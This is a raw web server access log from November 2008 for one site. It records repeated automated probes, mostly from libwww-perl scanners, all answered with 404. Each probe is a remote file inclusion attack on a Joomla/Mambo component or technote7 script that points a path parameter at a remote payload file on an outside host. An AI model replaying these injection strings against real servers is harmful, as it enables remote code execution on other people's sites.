58.227.192.80 - - [11/Nov/2008:21:03:12 -0800] "GET /logs/access_070812.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:21:07:10 -0800] "GET /logs/access_070912.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.94.235.191 - - [11/Nov/2008:21:07:39 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:21:08:47 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:21:11:06 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:21:11:06 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:21:11:06 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.125.79.167 - - [11/Nov/2008:21:11:49 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
121.125.79.167 - - [11/Nov/2008:21:11:49 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
121.125.79.167 - - [11/Nov/2008:21:11:52 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:21:14:38 -0800] "GET /logs/access.log%20/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.125.79.167 - - [11/Nov/2008:21:14:40 -0800] "GET /logs/access.log%20/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:21:14:41 -0800] "GET /logs/access_071112.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:21:14:41 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:21:14:42 -0800] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
118.45.190.166 - - [11/Nov/2008:21:14:57 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
118.45.190.166 - - [11/Nov/2008:21:14:57 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
118.45.190.166 - - [11/Nov/2008:21:14:58 -0800] "GET /logs/access_071012.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://sayphoto.net/bbs/i